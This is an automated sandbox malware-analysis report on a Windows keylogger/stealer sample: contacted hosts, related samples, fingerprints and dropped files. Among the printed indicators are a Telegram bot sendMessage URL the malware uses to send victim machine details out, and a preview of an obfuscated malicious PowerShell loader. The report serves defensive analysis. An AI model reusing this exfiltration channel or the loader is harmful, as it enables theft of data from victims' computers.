http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	msiexec.exe, 0000000B.00000002.3827428231.0000000025D01000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	msiexec.exe, 0000000B.00000002.3828910007.0000000027011000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3828910007.0000000026D21000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:390120%0D%0ADate%20a	msiexec.exe, 0000000B.00000002.3827428231.0000000025DE2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/	msiexec.exe, 0000000B.00000002.3827428231.0000000025D4B000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
132.226.8.169	checkip.dyndns.com	United States	16989	UTMEMUS	false
142.250.186.129	drive.usercontent.google.com	United States	15169	GOOGLEUS	false
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
104.21.80.1	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false
216.58.206.46	drive.google.com	United States	15169	GOOGLEUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1587710
Start date and time:	2025-01-10 17:14:12 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 35s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	15
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	r5yYt97sfB.exe renamed because original name is a hash value
Original Sample Name:	88a5fa91e12be14e5e37a237da70392dd9218f29ad88fa2cff8693ab4e215e81.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@6/16@5/5
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 99% Number of executed functions: 54 Number of non-executed functions: 26
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.245.163.56
Excluded domains from analysis (whitelisted): d.8.0.a.e.e.f.b.0.0.0.0.0.0.0.0.5.0.0.0.0.0.8.0.0.3.0.1.3.0.6.2.ip6.arpa, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target msiexec.exe, PID 7864 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
11:15:17	API Interceptor	40x Sleep call for process: powershell.exe modified
11:17:32	API Interceptor	1707999x Sleep call for process: msiexec.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
132.226.8.169	b5JCISnBV1.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	jqxrkk.ps1	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	Order_List.scr.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	checkip.dyndns.org/
	fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	CTM REQUEST-ETD JAN 22, 2024_pdf.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	pbCN4g6sN5.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	HVSU7GbA5N.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	ENQ-0092025.doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	document pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
149.154.167.220	RmIYOfX0yO.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	IUqsn1SBGy.exe	Get hash	malicious	AgentTesla	Browse
	8nkdC8daWi.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	B7N48hmO78.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	VIAmJUhQ54.exe	Get hash	malicious	MassLogger RAT	Browse
	PO#17971.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse
	https://marcuso-wq.github.io/home/	Get hash	malicious	HTMLPhisher	Browse
	https://ranprojects0s0wemanin.nyc3.digitaloceanspaces.com/webmail.html	Get hash	malicious	HTMLPhisher	Browse
	dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	RmIYOfX0yO.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.80.1
	zAK7HHniGW.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.112.1
	MtxN2qEWpW.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.112.1
	8nkdC8daWi.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.96.1
	b5JCISnBV1.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.16.1
	ql8KpEHT7y.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.96.1
	8kDIr4ZdNj.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.16.1
	2V7usxd7Vc.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.16.1
	tx4pkcHL9o.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.32.1
	New Order-090125.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.64.1
api.telegram.org	RmIYOfX0yO.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	IUqsn1SBGy.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	8nkdC8daWi.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	B7N48hmO78.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	VIAmJUhQ54.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	PO#17971.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	https://marcuso-wq.github.io/home/	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	https://ranprojects0s0wemanin.nyc3.digitaloceanspaces.com/webmail.html	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
checkip.dyndns.com	RmIYOfX0yO.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	158.101.44.242
	zAK7HHniGW.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	MtxN2qEWpW.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	8nkdC8daWi.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	b5JCISnBV1.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	ql8KpEHT7y.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	8kDIr4ZdNj.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	2V7usxd7Vc.exe	Get hash	malicious	MassLogger RAT	Browse	158.101.44.242
	tx4pkcHL9o.exe	Get hash	malicious	MassLogger RAT	Browse	158.101.44.242
	New Order-090125.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	132.226.247.73

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	RmIYOfX0yO.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	IUqsn1SBGy.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	8nkdC8daWi.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	4hQFnbWlj8.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	4hQFnbWlj8.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	B7N48hmO78.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	VIAmJUhQ54.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	PO#17971.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	https://marcuso-wq.github.io/home/	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
CLOUDFLARENETUS	RmIYOfX0yO.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.80.1
	zAK7HHniGW.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.112.1
	MtxN2qEWpW.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.112.1
	IUqsn1SBGy.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	8nkdC8daWi.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.96.1
	b5JCISnBV1.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.16.1
	ql8KpEHT7y.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.96.1
	8kDIr4ZdNj.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.16.1
	2V7usxd7Vc.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.16.1
	NWPZbNcRxL.exe	Get hash	malicious	FormBook	Browse	188.114.97.3
UTMEMUS	MtxN2qEWpW.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	8nkdC8daWi.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	b5JCISnBV1.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	New Order-090125.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	132.226.247.73
	B7N48hmO78.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	1C24TDP_000000029.jse	Get hash	malicious	MassLogger RAT	Browse	132.226.247.73
	jqxrkk.ps1	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	RmIYOfX0yO.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.80.1
	zAK7HHniGW.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.80.1
	MtxN2qEWpW.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.80.1
	8nkdC8daWi.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.80.1
	b5JCISnBV1.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.80.1
	ql8KpEHT7y.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.80.1
	8kDIr4ZdNj.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.80.1
	2V7usxd7Vc.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.80.1
	tx4pkcHL9o.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.80.1
	New Order-090125.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.80.1
3b5074b1b5d032e5620f69f9f700ff0e	RmIYOfX0yO.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	IUqsn1SBGy.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	8nkdC8daWi.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	2V7usxd7Vc.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	ID_Badge_Policy.pdf	Get hash	malicious	KnowBe4, PDFPhish	Browse	149.154.167.220
	DpTbBYeE7J.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	149.154.167.220
	RJKUWSGxej.exe	Get hash	malicious	AgentTesla, RedLine	Browse	149.154.167.220
	7DpzcPcsTS.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	B8FnDUj8hy.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	FSRHC6mB16.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	149.154.167.220
37f463bf4616ecd445d4a1937da06e19	RmIYOfX0yO.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	142.250.186.129 216.58.206.46
	4hQFnbWlj8.exe	Get hash	malicious	Vidar	Browse	142.250.186.129 216.58.206.46
	4hQFnbWlj8.exe	Get hash	malicious	Vidar	Browse	142.250.186.129 216.58.206.46
	Mmm7GmDcR4.exe	Get hash	malicious	LummaC	Browse	142.250.186.129 216.58.206.46
	g7Mz6hLxqw.exe	Get hash	malicious	GuLoader	Browse	142.250.186.129 216.58.206.46
	ln5S7fIBkY.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	142.250.186.129 216.58.206.46
	Osb7hkGfAb.exe	Get hash	malicious	GuLoader	Browse	142.250.186.129 216.58.206.46
	SvmL9tW29w.exe	Get hash	malicious	GuLoader	Browse	142.250.186.129 216.58.206.46
	Osb7hkGfAb.exe	Get hash	malicious	GuLoader	Browse	142.250.186.129 216.58.206.46
	fTSt7dc60O.exe	Get hash	malicious	GuLoader	Browse	142.250.186.129 216.58.206.46

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\nss7012.tmp\nsExec.dll	RmIYOfX0yO.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	Technonomic.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse
	Azygoses125.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse
	WYnv59N83j.exe	Get hash	malicious	FormBook, GuLoader	Browse
	t6V3uvyaAP.exe	Get hash	malicious	GuLoader	Browse
	WYnv59N83j.exe	Get hash	malicious	GuLoader	Browse
	t6V3uvyaAP.exe	Get hash	malicious	GuLoader	Browse
	Unspuriousness.exe	Get hash	malicious	FormBook, GuLoader	Browse
	Unspuriousness.exe	Get hash	malicious	GuLoader	Browse
	Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Get hash	malicious	AgentTesla, GuLoader	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	53158
Entropy (8bit):	5.062687652912555
Encrypted:	false
SSDEEP:	1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
MD5:	5D430F1344CE89737902AEC47C61C930
SHA1:	0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
SHA-256:	395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
SHA-512:	DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_00urj3h5.aj1.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rnao4bzc.muv.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tossur1e.mmr.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y1t34orq.fuf.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\nss6449.tmp

Download File

Process:	C:\Users\user\Desktop\r5yYt97sfB.exe
File Type:	data
Category:	dropped
Size (bytes):	10785973
Entropy (8bit):	0.6364702292960722
Encrypted:	false
SSDEEP:	12288:mzVSlYOUMa3NTzdv1AroxQMZU03CmgqJLOQR:YMlYLMadTz/AroxlZXx
MD5:	23B1E13F420ED91FB2B5813640A26CFA
SHA1:	D78D705005D4B54D16C8C60740B9D8652CB73337
SHA-256:	4D18ABFAFDAA9E0A8476370F3F1E6148A7ACDE79986E172EABB74541E709F872
SHA-512:	9A31E517AAD363163E099E83FFF6588A5A66288CC3E2DB1CF2B9EE61F1A310F99F932C37FD39BBD5BA401E9ECA8C5336E39DA4E49FFC59053BDBCA92B3C29C60
Malicious:	false
Preview:	........,...................q... ........-..................................................................................................................................................................................................................................................G...R...............j...............................................................................................................................#...........6...,....)..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nss7012.tmp\nsExec.dll

Download File

Process:	C:\Users\user\Desktop\r5yYt97sfB.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	6656
Entropy (8bit):	5.139253382998066
Encrypted:	false
SSDEEP:	96:s7fhfKaGgchPzxK6bq+pKX6D8ZLidGgmkN838:UbGgGPzxeX6D8ZyGgmkN
MD5:	1B0E41F60564CCCCCD71347D01A7C397
SHA1:	B1BDDD97765E9C249BA239E9C95AB32368098E02
SHA-256:	13EBC725F3F236E1914FE5288AD6413798AD99BEF38BFE9C8C898181238E8A10
SHA-512:	B6D7925CDFF358992B2682CF1485227204CE3868C981C47778DD6DA32057A595CAA933D8242C8D7090B0C54110D45FA8F935A1B4EEC1E318D89CC0E44B115785
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: RmIYOfX0yO.exe, Detection: malicious, Browse Filename: Technonomic.exe, Detection: malicious, Browse Filename: Azygoses125.exe, Detection: malicious, Browse Filename: WYnv59N83j.exe, Detection: malicious, Browse Filename: t6V3uvyaAP.exe, Detection: malicious, Browse Filename: WYnv59N83j.exe, Detection: malicious, Browse Filename: t6V3uvyaAP.exe, Detection: malicious, Browse Filename: Unspuriousness.exe, Detection: malicious, Browse Filename: Unspuriousness.exe, Detection: malicious, Browse Filename: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,..................Rich...........PE..L...[..V...........!......................... ...............................P.......................................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..L.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\magmaet\clenched\Dipterologist.Fra

Download File

Process:	C:\Users\user\Desktop\r5yYt97sfB.exe
File Type:	Unicode text, UTF-8 text, with very long lines (4143), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	73349
Entropy (8bit):	5.192358935913517
Encrypted:	false
SSDEEP:	1536:S8huwQMWGQrfaaLDx6ojsbC3OdUeR4PR50Chr25SQXegbJcLp:S8huwQMKbaavNjswOdUpJ5XhqSQB2p
MD5:	0BC26F780285CC594B4223505DC6435B
SHA1:	04907D370431440A307277DCE105215F43600157
SHA-256:	4D22C8FCC501F0637F1AF1F573FA2EF20F0199EAC74A547D7D887040A6D73454
SHA-512:	C5D6CC92B27C554B411253AD3871078307D64B9DB6827AC6D98AE2CCA5215A6636EDC64E15A607FF7FAD53468E48302FF73D0CA71E6E13D3F453BCFF6533D741
Malicious:	true
Preview:	$Endenizen=$Tilfredsstillendes;........$Wait = @'.Skilred. skaret$Dratt nSKlapt euFunk ioeUnd,rkud BylteriAnnekten,udiciagHyochol1Udsmykk2Gearc,s8Hyper o=Letvgts$JasperiNSprogrgoAdressen MundincIldgernaUdtryk,lProlamic baconsu Calvinl Termina UlvemobUrinstilmetacaryB.worria Contrat MellemhF rfaldy,ebudersSuperexoG nuflep ematosh F,uepai Nonumbcdeutero;Outblot.StatshufCovilleu Ddvg enHyttefacCo,ebistRomboidi Stik ioOadalfrnForskn. UnpowdeUTilskrefFnblgnirprodukteGu vesadU.ilbrleAssembll DorteriKa,sejlgconsummhT.ngsleeLoinclod.rthrods eacan floatpl(Bsninge$T achodsAntimonvEnspndeeStvkonsjInbreattProdukts,roheime Erot srDouci enortho resarrowk,Jernfor$Salv biNUncompaoFraternnDomptrecAfhringaStumpvilLogicizcKontingu Immelol Fj rkra Loser b.hrombolSolerneyBahutuc)Ge,nemf skaerme{Mycetes.Branden.Metepas$ DelmetRTilga geKonkurrgB anddri rkstrsBeryl itLite arrWreckyceI dleverS agpriiMejslednprecompgu ffrozeSinuousn Geo gi Epilogu(RekommaSReproaceMinimump Rec.rctEftersgi unisexfBane.sda Unre

C:\Users\user\AppData\Local\magmaet\clenched\Gruppekonto\Frontoparietal.ruf

Download File

Process:	C:\Users\user\Desktop\r5yYt97sfB.exe
File Type:	data
Category:	dropped
Size (bytes):	2387610
Entropy (8bit):	0.15942566220329682
Encrypted:	false
SSDEEP:	768:wzAcmELvlCt64oADSmhDEZNe508HYwhsi6zgTmx5upMjAthZFH/Jd3gmXTQu5Y+U:
MD5:	87E50D263F04628637C01FDD66A8F091
SHA1:	C6B097FD62805352C893727A5EDA4BEEDE2E413C
SHA-256:	F59F52215B994807B8ECBB7804CA1C8B4214A8BAAA2DD465E49080B695410842
SHA-512:	3E0BF1BDFEBFF9C29E0C82B0E37EBEC4FE6D94954391658F6CD95E485B76AA7E6FAE87CB70E809684B060A5C966855EE9EB4E8EEB6F178A23BA1E5B69F7954F7
Malicious:	false
Preview:	.....................................................................................................................................................&................................................................................................................................................................................................................................................#.....................................................................................................................................A..........................................................1.............................................................................'.................................................................u..................................................................................................................................................................................................................................................%.............................

C:\Users\user\AppData\Local\magmaet\clenched\Gruppekonto\aarsungens.bla

Download File

Process:	C:\Users\user\Desktop\r5yYt97sfB.exe
File Type:	data
Category:	dropped
Size (bytes):	2802123
Entropy (8bit):	0.16014721035839247
Encrypted:	false
SSDEEP:	768:RaE9710bnra8qiClzbvAx57Ano7sKqOSTiTSqBoChrYB6j2QwGcklvNWuxDgQ4uv:C
MD5:	A7D919B312C1C74AB4C35A522D946B77
SHA1:	80DBDC65B19CFB6CBE8AECFA41D28F450857DCC5
SHA-256:	09C869BFBB2A5B7CC84D9E0F56C4F9FA728E1F23C2415DDC0E74FC3D39AA6154
SHA-512:	389824FE2C76C6C2204A56ACC7A160D133279B1C0C1F4A0635DA9351C4D82661D31DF2C536DC2A238F040A23AED46ADDD62657350EDFBA6820869B5B9C0473A5
Malicious:	false
Preview:	.............................................................w............................................................................................................................................................................................7..........................................................................................................................................................................^......................................................................................................................................................................................................r....................d..............................................................................................................................v.......................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\magmaet\clenched\Gruppekonto\forsmgt.txt

Download File

Process:	C:\Users\user\Desktop\r5yYt97sfB.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	398
Entropy (8bit):	4.246758482060977
Encrypted:	false
SSDEEP:	6:oqMiL/AZwy9A2YYut9HLv4CDGcL+iEnHE9DChVgwCtMWIX0FWWAz6CJArAkyVMIb:vMiL/RDttZPDpL0nHlVg1tXqMWjhb
MD5:	A01CF8B2F34D6F8D6A6067AD87AD420F
SHA1:	C49BFD81A1418697165CB62EDBEEF5E8D47157BA
SHA-256:	A85ACBE8F4FAD0CA373D1BC143633962C89D69E1503A3C310E283DA4EF97B4D7
